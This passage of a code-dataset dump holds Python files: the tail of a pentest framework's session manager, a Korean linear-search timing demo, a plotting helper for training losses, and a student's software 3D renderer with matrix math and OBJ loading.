connection spawned!\")\n self.badges.output_information(\"Type commands below.\\n\")\n\n sessions[session_platform][int(session_id)]['object'].interact()\n else:\n self.badges.output_error(\"Invalid session given!\")\n\n def close_session(self, session_platform, session_id):\n sessions = self.local_storage.get(\"sessions\")\n if self.check_exist(session_platform, session_id):\n try:\n sessions[session_platform][int(session_id)]['object'].close()\n del sessions[session_platform][int(session_id)]\n\n if not sessions[session_platform]:\n del sessions[session_platform]\n self.local_storage.update(\"sessions\", sessions)\n except Exception:\n self.badges.output_error(\"Failed to close session!\")\n else:\n self.badges.output_error(\"Invalid session given!\")\n\n def get_session(self, session_platform, session_type, session_id):\n sessions = self.local_storage.get(\"sessions\")\n if self.check_exist(session_platform, session_id):\n if session_type == sessions[session_platform][int(session_id)]['type']:\n return sessions[session_platform][int(session_id)]['object']\n self.badges.output_error(\"Session with invalid type!\")\n return None\n return 
None\n","sub_path":"hatsploit/lib/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"387175072","text":"from datetime import datetime\n#numbers = [1, 30, 32, 500, 560, 679, 2300, 2344, 4, 12, 3431, 50392, 3322, 31415, 314, 4324, 4214, 42222, 59129, 10501, 35,67,888,2,3,5,6,7,15,18]\nnumbers = []\nfor i in range(1000000):\n numbers.append(i)\n\nnum = int(input(\"검색할 숫자를 입력하세요: \"))\nsearch_count = 0\nnumbers.sort() #자동 정렬\n\nprint(\"\\n다음의 배열들에서 숫자{}를 검색합니다.: \".format(num))\nprint(numbers)\nprint(\"\\n\\n\\n\")\n\nsearch_ok = False\n\ntime_now = datetime.now()\nfor i in range(len(numbers)):\n search_count+= 1\n if (numbers[i] == num):\n print(\"{}를 기본 주어진 배열에서 {}번째 검색만에 찾았습니다.\".format(num, search_count))\n search_ok = True\n break\n print(\"[검색중][{}번째 검색] 남은 검색할 항목 갯수: {}개 남았습니다.\".format(search_count, len(numbers) - search_count))\ntime_end = datetime.now()\ndelta = time_end - time_now\n\nif (search_ok == False):\n print(\"{}를 기본 주어진 배열에서 {}번 검색했지만 찾지 못했습니다..\".format(num, search_count))\nprint(\"검색 작업 실행시간: {}\".format(delta))","sub_path":"noefficient_search.py","file_name":"noefficient_search.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"649551780","text":"import os, sys\nimport matplotlib.pyplot as plt\n\nfrom bokeh.plotting import figure, output_file, show, save\n\nLOSS_OVER_N_EPOCHS_DICT_KEYS = [\"train_loss\", \"test_loss\"]\nSCORE_KEY_MAP = {'precision': 0, 'recall': 1, 'f1': 2}\n\ndef validate_loss_over_n_dict_keys(loss_over_n_epochs: dict):\n assert all([key in LOSS_OVER_N_EPOCHS_DICT_KEYS for key in loss_over_n_epochs.keys()])\n\n\ndef plot_loss_over_n_epochs(loss_over_n_epochs: dict,\n title=None,\n file_path=None,\n hard_key = None,\n fig_size: tuple = (10, 6)):\n\n# validate_loss_over_n_dict_keys(loss_over_n_epochs)\n fig = plt.figure(figsize=fig_size)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Epochs')\n ax.set_ylabel('Loss')\n if title:\n ax.set_title(title)\n \n if hard_key is None:\n hard_key = next(iter(loss_over_n_epochs.keys()))\n n_epochs = len(loss_over_n_epochs[hard_key])\n\n for key in loss_over_n_epochs:\n # If nothing to plot just skip that split.\n if len(loss_over_n_epochs[key]) == 0:\n continue\n ax.plot(range(1, n_epochs + 1), loss_over_n_epochs[key], label=key)\n\n plt.legend()\n\n if file_path:\n file_path = os.path.join(PLOTTING_ROOT, file_path)\n print(\"File Path: \", file_path)\n fig.savefig(file_path)\n\n plt.show()\n\n\ndef plot_score_over_n_epochs(scores_over_n_epochs: dict,\n score_type='f1',\n title=None,\n file_path=None,\n fig_size: tuple = (10, 6)):\n assert score_type in SCORE_KEY_MAP.keys(), \"Invalid Score type.\"\n\n fig = plt.figure(figsize=fig_size)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Epochs')\n ax.set_ylabel('{} Score'.format(score_type))\n if title:\n ax.set_title(title)\n\n f1_score_key = SCORE_KEY_MAP[score_type]\n\n first_key = next(iter(scores_over_n_epochs.keys()))\n n_epochs = len(scores_over_n_epochs[first_key])\n\n for key in scores_over_n_epochs:\n f1_score = []\n if len(scores_over_n_epochs[key]) == 0:\n continue\n for epoch in range(n_epochs):\n f1_score.append(scores_over_n_epochs[key][epoch][f1_score_key])\n\n ax.plot(range(1, n_epochs + 1), f1_score, label=key)\n\n plt.legend()\n plt.show()\n\ndef get_empty_stat_over_n_epoch_dictionaries():\n loss_over_epochs = {\n 
\"train_loss\": [],\n \"val_loss\": [],\n \"test_loss\": []\n }\n\n scores_over_epochs = {\n \"train_scores\": [],\n \"val_scores\": [],\n \"test_scores\": [],\n \"overall_scores\": []\n }\n\n return loss_over_epochs, scores_over_epochs\n\n\ndef plot_line_chart_using_bokeh(x_axis_data: list, y_axis_data: list, colors: list,\n title: str, output_file_name: str,\n plot_height=350, plot_width=800,\n line_alpha=0.5, line_width=1,\n x_label='Time', y_label='Value',\n show_fig=True):\n assert len(x_axis_data) == len(y_axis_data) and len(x_axis_data) == len(\n y_axis_data), \"Length miss-match for x-axis or y-axis data.\"\n\n p = figure(x_axis_type=\"datetime\", title=title, plot_height=plot_height, plot_width=plot_width)\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_alpha = 0.5\n p.xaxis.axis_label = x_label\n p.yaxis.axis_label = y_label\n p.multi_line(x_axis_data, y_axis_data, line_color=colors, line_width=line_width, line_alpha=line_alpha)\n output_file(output_file_name)\n if show_fig:\n show(p)","sub_path":"S19 VQA/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"463998250","text":"\"\"\"\nMaria Ines Vasquez Figueroa\n18250\nGráficas\nProyecto Software Rendering\nFunciones\n\"\"\"\nimport struct\nfrom obj import Obj\nimport random\nfrom numpy import cos, sin, tan, matrix\nimport numpy as np\n\"\"\"\nCarlos nos permitio usar numpy para las operaciones de cos, sin, tan y transformar de grados a radianes, todas las otras operaciones matematica\nfueron sustituidas y creadas por mi.\n\"\"\"\n\n\ndef char(c):\n # 1 byte\n return struct.pack('=c', c.encode('ascii'))\n\ndef word(w):\n # 2 bytes\n return struct.pack('=h',w)\n\ndef dword(d):\n # 4 bytes\n return struct.pack('=l',d)\n\ndef color(r, g, b):\n #return bytes([b, g, r])\n try:\n return bytes([int(b * 255), int(g * 255), int(r * 255)])\n except:\n pass\ndef baryCoords(Ax, Bx, Cx, Ay, By, Cy, Px, Py):\n # u es para la A, v es para B, w para C\n try:\n u = ( ((By - Cy)*(Px - Cx) + (Cx - Bx)*(Py - Cy) ) /\n ((By - Cy)*(Ax - Cx) + (Cx - Bx)*(Ay - Cy)) )\n\n v = ( ((Cy - Ay)*(Px - Cx) + (Ax - Cx)*(Py - Cy) ) /\n ((By - Cy)*(Ax - Cx) + (Cx - Bx)*(Ay - Cy)) )\n\n w = 1 - u - v\n except:\n return -1, -1, -1\n\n return u, v, w\n\n\nBLACK = color(0,0,0)\nWHITE = color(1,1,1)\n\nclass Render(object):\n def __init__(self, width, height): #funncion que actua como el glInit\n #self.glInit(width, height)\n self.curr_color = WHITE\n self.curr_color_bg=BLACK\n self.glCreateWindow(width, height)\n self.lightx=1\n self.lighty=0\n self.lightz=1\n self.active_texture = None\n self.active_normalMap = None\n self.active_texture2 = None\n self.active_shader = None\n \"\"\"self.camPosition=(0,0,0)\n self.camRotation=(0,0,0)\"\"\"\n self.createViewMatrix()\n self.createProjectionMatrix()\n \n def createViewMatrix(self, camPosition = (0,0,0), camRotation = (0,0,0)):\n camMatrix = self.createObjectMatrix( translate = camPosition, rotate = camRotation)\n self.viewMatrix=self.getMatrixInverse(camMatrix)\n \"\"\"print(self.viewMatrix)\n print(np.linalg.inv(matrix(camMatrix)))\n print(\"-----------\")\"\"\"\n \n\n #funciones para sacar inversa de la matriz extraido de: https://stackoverflow.com/questions/32114054/matrix-inversion-without-numpy, editado por mi para acomodarlo al proyecto\n def transposeMatrix(self, m):\n a=[[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]\n for i in range(0, 4):\n for j in range(0, 4):\n a[j][i]=m[i][j]\n 
return a\n\n def getMatrixMinor(self,m,i,j):\n return [row[:j] + row[j+1:] for row in (m[:i]+m[i+1:])]\n\n def getMatrixDeternminant(self, m):\n #base case for 2x2 matrix\n if len(m) == 2:\n return m[0][0]*m[1][1]-m[0][1]*m[1][0]\n\n determinant = 0\n for c in range(len(m)):\n determinant += ((-1)**c)*m[0][c]*self.getMatrixDeternminant(self.getMatrixMinor(m,0,c))\n return determinant\n\n def getMatrixInverse(self, m):\n determinant = self.getMatrixDeternminant(m)\n #special case for 2x2 matrix:\n if len(m) == 2:\n return [[m[1][1]/determinant, -1*m[0][1]/determinant],\n [-1*m[1][0]/determinant, m[0][0]/determinant]]\n\n #find matrix of cofactors\n cofactors = []\n for r in range(len(m)):\n cofactorRow = []\n for c in range(len(m)):\n minor = self.getMatrixMinor(m,r,c)\n cofactorRow.append(((-1)**(r+c)) * self.getMatrixDeternminant(minor))\n cofactors.append(cofactorRow)\n cofactors = self.transposeMatrix(cofactors)\n for r in range(len(cofactors)):\n for c in range(len(cofactors)):\n cofactors[r][c] = cofactors[r][c]/determinant\n return cofactors\n\n def lookAt(self, eye, camPosition = (0,0,0)):\n\n \"\"\"print(camPosition)\n print(eye)\n print(np.subtract(camPosition, eye))\n print(\"+++++++++++++++++++++\")\"\"\"\n \"\"\"print(\"resta mia\")\n print(self.subtract(camPosition[0],eye[0],camPosition[1],eye[1],camPosition[2],eye[2]))#funciona\"\"\"\n #forward = np.subtract(camPosition, eye)\n pforward=self.subtract(camPosition[0],eye[0],camPosition[1],eye[1],camPosition[2],eye[2])\n pforward=self.division(pforward, self.frobenius(pforward))#si funciona ya\n \"\"\"print(\"resta numpy\")\n print(np.subtract(camPosition, eye))\n print(\"normal\")\n print(np.linalg.norm(forward))\"\"\"\n \n #forward = forward / np.linalg.norm(forward)\n \"\"\"print(\"resta numpy/normal\")\n print(forward)\n print(\"mi forward\")\n print(pforward)\"\"\"\n \n \"\"\"print(\"cross con numpy\")\n print(np.cross(V3(0,1,0), forward))\n print(\"mi cross\")\n print(self.cross((0,1,0),forward))\n right = np.cross(V3(0,1,0), forward)\n print(\"right/normal numpy\")\n right = right / np.linalg.norm(right)\n print(right)\n print(\"mi version\")\"\"\"\n pright=self.division(self.cross((0,1,0),pforward), self.frobenius(pforward))\n #print(pright)\n\n \"\"\"up = np.cross(forward, right)\n up = up / np.linalg.norm(up)\"\"\"\n pup=self.cross(pforward, pright)\n pup=self.division(pup, self.frobenius(pup))\n #print(pup)\n\n camMatrix = [[pright[0], pup[0], pforward[0], camPosition[0]],\n [pright[1], pup[1], pforward[1], camPosition[1]],\n [pright[2], pup[2], pforward[2], camPosition[2]],\n [0,0,0,1]]\n\n \n self.viewMatrix=self.getMatrixInverse(camMatrix)\n #self.viewMatrix=camMatrix\n \n \n #Inicializa objetos internos\n def glInit(self, width, height):\n #esto se establece ahora en la funcion glCreatWindow\n \"\"\"self.width = width\n self.height = height\"\"\"\n self.curr_color = WHITE\n self.curr_color_bg=BLACK\n self.glCreateWindow(width, height)\n \"\"\"self.glClearColor(red, green, blue)\n self.glClear()\"\"\"\n\n #inicializa framebuffer\n def glCreateWindow(self, width, height):\n self.width = width\n self.height = height\n self.glClear()\n self.glViewPort(0, 0, width, height)\n\n #define area de dibujo\n def glViewPort(self, x, y, width, height):\n self.vportwidth = width\n self.vportheight = height\n self.vportx = x\n self.vporty = y\n #matriz del viewport para crear camara\n self.viewportMatrix = [[width/2, 0, 0, x + width/2],\n [0, height/2, 0, y + height/2],\n [0, 0, 0.5, 0.5],\n [0, 0, 0, 1]]\n \n def 
createProjectionMatrix(self, n = 0.1, f = 1000, fov = 60):\n\n t = tan((fov * np.pi / 180) / 2) * n\n r = t * self.vportwidth / self.vportheight\n\n self.projectionMatrix = [[n / r, 0, 0, 0],\n [0, n / t, 0, 0],\n [0, 0, -(f+n)/(f-n), -(2*f*n)/(f-n)],\n [0, 0, -1, 0]] \n #cambia el color con el que se llena el mapa de bits (fondo)\n def glClearColor(self, red, green, blue):\n nred=int(255*red)\n ngreen=int(255*green)\n nblue=int(255*blue)\n self.curr_color_bg = color(nred, ngreen, nblue)\n\n #llena el mapa de bits de un solo color predeterminado antes\n def glClear(self):\n self.pixels = [ [ self.curr_color_bg for x in range(self.width)] for y in range(self.height) ]\n #Z - buffer, depthbuffer, buffer de profudidad\n self.zbuffer = [ [ float('inf') for x in range(self.width)] for y in range(self.height) ]\n\n \n #dibuja el punto en relación al viewport\n def glVertex(self, x, y):\n nx=int((x+1)*(self.vportwidth/2)+self.vportx)\n ny=int((y+1)*(self.vportheight/2)+self.vporty)\n\n if nx >= self.width or nx < 0 or ny >= self.height or ny < 0:\n return\n try:\n self.pixels[ny][nx] = self.curr_color\n except:\n pass\n \n #cambia de color con el que se hará el punto con parametros de 0-1\n def glColor(self, red, green, blue):\n nred=int(255*red)\n ngreen=int(255*green)\n nblue=int(255*blue)\n self.curr_color = color(nred, ngreen, nblue)\n \n def glVertex_coord(self, x,y, color = None):#helper para dibujar puntas en la funcion de glLine, \n #ahora mejorado para solo dibujar cuando no hay nada abajo ya dibujado, más eficiente\n if x < self.vportx or x >= self.vportx + self.vportwidth or y < self.vporty or y >= self.vporty + self.vportheight:\n return\n if x >= self.width or x < 0 or y >= self.height or y < 0:\n return\n try:\n self.pixels[y][x] = color or self.curr_color\n except:\n pass\n\n\n #escribe el archivo de dibujo\n def glFinish(self, filename):\n archivo = open(filename, 'wb')\n\n # File header 14 bytes\n #f.write(char('B'))\n #f.write(char('M'))\n\n archivo.write(bytes('B'.encode('ascii')))\n archivo.write(bytes('M'.encode('ascii')))\n\n archivo.write(dword(14 + 40 + self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(14 + 40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n\n # Pixeles, 3 bytes cada uno\n\n for x in range(self.height):\n for y in range(self.width):\n #try:\n archivo.write(self.pixels[x][y])\n \"\"\"except:\n continue\"\"\"\n\n\n archivo.close()\n \n def glZBuffer(self, filename):\n archivo = open(filename, 'wb')\n #misma configuracion de espacio que glFinish\n # File header 14 bytes\n archivo.write(bytes('B'.encode('ascii')))\n archivo.write(bytes('M'.encode('ascii')))\n archivo.write(dword(14 + 40 + self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(14 + 40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n\n #Minimo y el maximo del Zbuffer\n minZ = float('inf')\n maxZ = -float('inf')\n for x in 
range(self.height):\n for y in range(self.width):\n if self.zbuffer[x][y] != -float('inf'):\n if self.zbuffer[x][y] < minZ:\n minZ = self.zbuffer[x][y]\n\n if self.zbuffer[x][y] > maxZ:\n maxZ = self.zbuffer[x][y]\n\n for x in range(self.height):\n for y in range(self.width):\n depth = self.zbuffer[x][y]\n if depth == -float('inf'):\n depth = minZ\n depth = (depth - minZ) / (maxZ - minZ)\n archivo.write(color(depth,depth,depth))\n\n archivo.close()\n\n def glLine(self, x0, y0, x1, y1): #algoritmo de clase modificado por mi en base al algoritmo de Bersenham extraido de : https://www.geeksforgeeks.org/bresenhams-line-generation-algorithm/\n x0 = int(( x0 + 1) * (self.vportwidth / 2 ) + self.vportx)\n x1 = int(( x1 + 1) * (self.vportwidth / 2 ) + self.vportx)\n y0 = int(( y0 + 1) * (self.vportheight / 2 ) + self.vporty)\n y1 = int(( y1 + 1) * (self.vportheight / 2 ) + self.vporty)\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n inc = dy > dx\n\n if inc:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n limit = 0.5\n \n #a diferencia del visto en clase, el algoritmo consultado inicializa m como 2 veces el diferencial en y \n #y offset como la resta entre la pendiente m y 2 veces el diferencial en x\n m=2*(dy)\n offset=m-2*dx\n y = y0\n for x in range(x0, x1 + 1):\n if inc:\n self.glVertex_coord(y, x)\n else:\n self.glVertex_coord(x, y)\n offset += m\n if offset >= limit:\n if y0 < y1:\n y += 1\n else:\n y-=1\n limit += 1\n #igualmente cuando offset es mayor o igual que el limite 0.5, se le resta 2 veces el diferencial en x\n offset-=2*dx\n \n def glLine_c(self, x0, y0, x1, y1):#algoritmo realizado con Carlos en clase, lo mantengo como comparacion y el resultado es muy similar al desarrollado por mi\n x0 = int(( x0 + 1) * (self.vportwidth / 2 ) + self.vportx)\n x1 = int(( x1 + 1) * (self.vportwidth / 2 ) + self.vportx)\n y0 = int(( y0 + 1) * (self.vportheight / 2 ) + self.vporty)\n y1 = int(( y1 + 1) * (self.vportheight / 2 ) + self.vporty)\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n inc = dy > dx\n\n if inc:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n offset = 0\n limit = 0.5\n m = dy/dx\n y = y0\n for x in range(x0, x1 + 1):\n if inc:\n self.glVertex_coord(y, x)\n else:\n self.glVertex_coord(x, y)\n offset += m\n if offset >= limit:\n y += 1 if y0 < y1 else -1\n limit += 1\n\n def glLine_coord(self, x0, y0, x1, y1): #window coordinates en base a mi algoritmo realizado, no da problema con division con cero\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n inc = dy > dx\n\n if inc:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n limit = 0.5\n \n #a diferencia del visto en clase, el algoritmo consultado inicializa m como 2 veces el diferencial en y \n #y offset como la resta entre la pendiente m y 2 veces el diferencial en x\n \n m=2*dy\n \n y = y0\n \n offset=m-2*dx\n for x in range(x0, x1 + 1):\n if inc:\n self.glVertex_coord(y, x)\n else:\n self.glVertex_coord(x, y)\n offset += m\n if offset >= limit:\n if y0 < y1:\n y += 1\n else:\n y-=1\n limit += 1\n #igualmente cuando offset es mayor o igual que el limite 0.5, se le resta 2 veces el diferencial en x\n offset-=2*dx\n\n #Barycentric Coordinates\n def triangle_bc(self, Ax, Bx, Cx, Ay, By, Cy, Az, Bz, Cz, tax, tbx, tcx, tay, tby, tcy, normals=(), colorest = WHITE):\n #bounding box\n minX = 
int(min(Ax, Bx, Cx))\n minY = int( min(Ay, By, Cy))\n maxX = int(max(Ax, Bx, Cx))\n maxY = int(max(Ay, By, Cy))\n\n for x in range(minX, maxX + 1):\n for y in range(minY, maxY + 1):\n if x >= self.width or x < 0 or y >= self.height or y < 0: #para no dar error al intentar dibujar fuera del zbuffer\n continue\n u, v, w = baryCoords(Ax, Bx, Cx, Ay, By, Cy, x,y)\n\n if u >= 0 and v >= 0 and w >= 0:\n\n z = Az * u + Bz * v + Cz * w\n \n if z < self.zbuffer[y][x] and z <= 1 and z >= -1:\n \n if self.active_shader:\n \n r, g, b = self.active_shader(\n self,\n verts=(Ax, Bx, Cx, Ay, By, Cy, Az, Bz, Cz),\n baryCoords=(u,v,w),\n texCoords=(tax, tbx, tcx, tay, tby, tcy),\n normals=normals,\n color = colorest or self.curr_color,\n coordy=(y,x))\n else:\n b, g, r = colorest or self.curr_color\n \n \n\n self.glVertex_coord(x, y, color(r,g,b))\n self.zbuffer[y][x] = z\n \n #funciones para reemplazar numpy del ejemplo de Carlos\n #Realiza la resta entre 2 listas\n def subtract(self, x0, x1, y0, y1, z0, z1):\n res=[]\n res.append(x0-x1)\n res.append(y0-y1)\n res.append(z0-z1)\n return res\n #Realiza la resta entre 2 listas de 2 entradas\n def subtractTwo(self, x0, x1, y0, y1):\n res=[]\n res.append(x0-x1)\n res.append(y0-y1)\n return res\n #realiza producto cruz entre dos listas\n def cross(self, v0, v1):\n res=[]\n res.append(v0[1]*v1[2]-v1[1]*v0[2])\n res.append(-(v0[0]*v1[2]-v1[0]*v0[2]))\n res.append(v0[0]*v1[1]-v1[0]*v0[1])\n return res\n\n #Calcula normal de Frobenius\n def frobenius(self, norm):\n return((norm[0]**2+norm[1]**2+norm[2]**2)**(1/2))\n\n #calcula la division entre elementos de una lista y la normal de frobenius\n def division(self, norm, frobenius):\n #si la division es entre cero regresa un not a number\n if (frobenius==0):\n res=[]\n res.append(float('NaN'))\n res.append(float('NaN'))\n res.append(float('NaN'))\n return res\n #return float('NaN')\n else:\n res=[]\n res.append(norm[0]/ frobenius)\n res.append(norm[1]/ frobenius)\n res.append(norm[2]/ frobenius)\n return res\n \n #realiza producto punto entre la matriz y la luz\n def dot(self, normal, lightx, lighty, lightz):\n return (normal[0]*lightx+normal[1]*lighty+normal[2]*lightz)\n \n def multiN(self, c, normal):\n return (normal[0]*c,normal[1]*c,normal[2]*c)\n \n def dot4(self, matrix1, matrix2):\n return (matrix1[0]*matrix2[0]+matrix1[1]*matrix2[1]+matrix1[2]*matrix2[2]+matrix1[3]*matrix2[3])\n\n def multiplicacion(self, matriz1, matriz2, c1, f1, c2, f2): #función para multiplicar matrices\n matriz3 = []\n for i in range(f1):\n matriz3.append( [0] * c2 )\n\n for i in range(f1):\n for j in range(c2):\n for k in range(f2):\n numf=matriz1[i][k] * matriz2[k][j]\n matriz3[i][j] += numf\n \n \n return matriz3\n\n def multiplicacionV(self, G, v, f1, c2): #función para multiplicar matrices, esta fue un fracaso pero la dejo porque tengo fe que algun día funcionará\n result = []\n for i in range(0,f1): #this loops through columns of the matrix\n total = 0\n for j in range(0,c2): #this loops through vector coordinates & rows of matrix\n total += v[i] *G[j][i]\n result.append(total)\n return result\n \n def multMaster(self, v, M): #función para multiplicar desde matrices hasta vectores\n c = []\n for i in range(0,len(v)):\n temp=[]\n for j in range(0,len(M[0])):\n s = 0\n for k in range(0,len(v[0])):\n s += v[i][k]*M[k][j]\n temp.append(s)\n c.append(temp)\n return c\n \n \n\n def transform(self, vertex, vMatrix):#sustitucion del transform antiguo\n\n \n pVertex=[ [vertex[0]], [vertex[1]], [vertex[2]], [1]]\n 
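# (added editor's note, not part of the original file) The chain below computes\n        # clip = viewport * projection * view * model * vertex and then applies the\n        # perspective divide by w. Equivalent sketch with the same helpers, assuming\n        # 4x4 nested-list matrices throughout:\n        #\n        #   clip = self.multMaster(self.multMaster(self.multMaster(self.multMaster(\n        #       self.viewportMatrix, self.projectionMatrix), self.viewMatrix), vMatrix), pVertex)\n        #   ndc = [clip[i][0] / clip[3][0] for i in range(3)]\n        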
a=self.multMaster(self.viewportMatrix, self.projectionMatrix)\n b=self.multMaster(a, self.viewMatrix)\n c=self.multMaster(b, vMatrix)\n pVertex=self.multMaster(c, pVertex)\n \n \n pVertex=(pVertex[0][0] / pVertex[3][0] ,\n pVertex[1][0] / pVertex[3][0] ,\n pVertex[2][0] / pVertex[3][0] )\n \n print(pVertex)\n \n return pVertex\n\n def dirTransform(self, vertex, vMatrix):#transform para las normales\n\n pVertex=[ [vertex[0]], [vertex[1]], [vertex[2]], [0]]\n \n a=self.multMaster(pVertex, vMatrix)\n \n pVertex=(a[0][0],\n a[1][0],\n a[2][0])\n\n return pVertex\n\n def createObjectMatrix(self, translate = (0,0,0), scale = (1,1,1), rotate=(0,0,0)):\n #matriz de traslacion\n translateMatrix = [[1, 0, 0, translate[0]],\n [0, 1, 0, translate[1]],\n [0, 0, 1, translate[2]],\n [0, 0, 0, 1]]\n\n #matriz de la escala\n scaleMatrix = [[scale[0], 0, 0, 0],\n [0, scale[1], 0, 0],\n [0, 0, scale[2], 0],\n [0, 0, 0, 1]]\n\n #matriz de rotacion\n rotationMatrix = self.createRotationMatrix(rotate)\n #multiplicacion de matrices sin numpy\n a=self.multiplicacion(translateMatrix, rotationMatrix, 4,4,4,4)\n b=self.multiplicacion(a, scaleMatrix, 4,4,4,4)\n\n return b\n \n def createRotationMatrix(self, rotate=(0,0,0)):\n\n pitch = np.deg2rad(rotate[0])\n yaw = np.deg2rad(rotate[1])\n roll = np.deg2rad(rotate[2])\n\n #matriz de rotacion en x\n rotationX = [[1, 0, 0, 0],\n [0, cos(pitch),-sin(pitch), 0],\n [0, sin(pitch), cos(pitch), 0],\n [0, 0, 0, 1]]\n #matriz de rotacion en y\n rotationY = [[cos(yaw), 0, sin(yaw), 0],\n [0, 1, 0, 0],\n [-sin(yaw), 0, cos(yaw), 0],\n [0, 0, 0, 1]]\n #matriz de rotacion en z\n rotationZ = [[cos(roll),-sin(roll), 0, 0],\n [sin(roll), cos(roll), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]\n #multiplicacion de matrices sin numpy\n a=self.multiplicacion(rotationX, rotationY, 4,4,4,4)\n b=self.multiplicacion(a, rotationZ, 4,4,4,4)\n return (b)\n\n def loadModel(self, filename, translate= (0,0,0), scale= (1,1,1), rotate=(0,0,0), isWireframe = False): #funcion para crear modelo Obj\n model = Obj(filename)\n modelMatrix = self.createObjectMatrix(translate, scale, rotate)\n rotationMatrix = self.createRotationMatrix(rotate)\n\n for face in model.faces:\n vertCount = len(face) #conexion entre vertices para crear Wireframe\n if isWireframe:\n for vert in range(vertCount):\n v0 = model.vertices[ face[vert][0] - 1 ]\n v1 = model.vertices[ face[(vert + 1) % vertCount][0] - 1]\n #coordenadas para dibujar linea con escala y traslacion setteado\n x0 = int(v0[0] * scale[0] + translate[0])\n y0 = int(v0[1] * scale[1] + translate[1])\n x1 = int(v1[0] * scale[0] + translate[0])\n y1 = int(v1[1] * scale[1] + translate[1])\n\n #self.glVertex_coord(x0, y0)\n \n self.glLine_coord(x0, y0, x1, y1)\n else:\n v0 = model.vertices[ face[0][0] - 1 ]\n v1 = model.vertices[ face[1][0] - 1 ]\n v2 = model.vertices[ face[2][0] - 1 ]\n v0 = self.transform(v0, modelMatrix)\n v1 = self.transform(v1, modelMatrix)\n v2 = self.transform(v2, modelMatrix)\n\n \n x0 = v0[0]\n y0 = v0[1]\n z0 = v0[2]\n x1 = v1[0]\n y1 = v1[1]\n z1 = v1[2]\n x2 = v2[0]\n y2 = v2[1]\n z2 = v2[2]\n\n if vertCount > 3: #asumamos que 4, un cuadrado\n v3 = model.vertices[ face[3][0] - 1 ]\n v3 = self.transform(v3, modelMatrix)\n x3 = v3[0]\n y3 = v3[1]\n z3 = v3[2]\n\n #----------FORMULA CON FUNCIONES POR MI---------------\n #normal=productoCruz(V1-V0, v2-V0)/Frobenius\n\n if self.active_texture:\n vt0 = model.texcoords[face[0][1] - 1]\n vt1 = model.texcoords[face[1][1] - 1]\n vt2 = model.texcoords[face[2][1] - 1]\n vt0x=vt0[0]\n vt0y=vt0[1]\n 
vt1x=vt1[0]\n vt1y=vt1[1]\n vt2x=vt2[0]\n vt2y=vt2[1]\n if vertCount > 3:\n vt3 = model.texcoords[face[3][1] - 1]\n vt3x=vt3[0]\n vt3y=vt3[1]\n\n else:\n vt0x=0\n vt0y=0\n vt1x=0\n vt1y=0\n vt2x=0\n vt2y=0\n vt3x=0\n vt3y=0\n \n vn0 = model.normals[face[0][2] - 1]\n vn1 = model.normals[face[1][2] - 1]\n vn2 = model.normals[face[2][2] - 1]\n #para rotar normales y que la luz no se mueva con el modelo OBJ\n vn0 = self.dirTransform(vn0, rotationMatrix)#sustituir con transform de normales\n vn1 = self.dirTransform(vn1, rotationMatrix)\n vn2 = self.dirTransform(vn2, rotationMatrix)\n if vertCount > 3:\n vn3 = model.normals[face[3][2] - 1]\n vn3 = self.dirTransform(vn3, rotationMatrix)\n\n\n #normalMI=self.division(self.cross(self.subtract(x1, x0, y1, y0, z1, z0), self.subtract(x2, x0, y2, y0, z2, z0)),self.frobenius(self.cross(self.subtract(x1, x0, y1, y0, z1, z0), self.subtract(x2, x0, y2, y0, z2, z0))) )\n #ProductoCruz(normal,light)\n\n #intensity = self.dot(normalMI, lightx, lighty, lightz)\n \"\"\"print(\"--------------intensity----------------------------\")\n print(intensity)\n print(self.dot(normalMI, lightx, lighty, lightz))\"\"\"\n\n #if intensity >=0:\n \n if vertCount > 3:\n self.triangle_bc(x0,x2,x3, y0, y2,y3, z0, z2,z3, vt0x, vt2x,vt3x, vt0y, vt2y, vt3y , normals=(vn0,vn2,vn3))\n self.triangle_bc(x0,x1,x2, y0, y1, y2, z0, z1, z2, vt0x , vt1x,vt2x,vt0y,vt1y, vt2y, normals = (vn0,vn1,vn2))\n\n\n \n \n \n \n\n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"gl.py","file_name":"gl.py","file_ext":"py","file_size_in_byte":27481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275091733","text":"\"\"\"introduction: four seasons 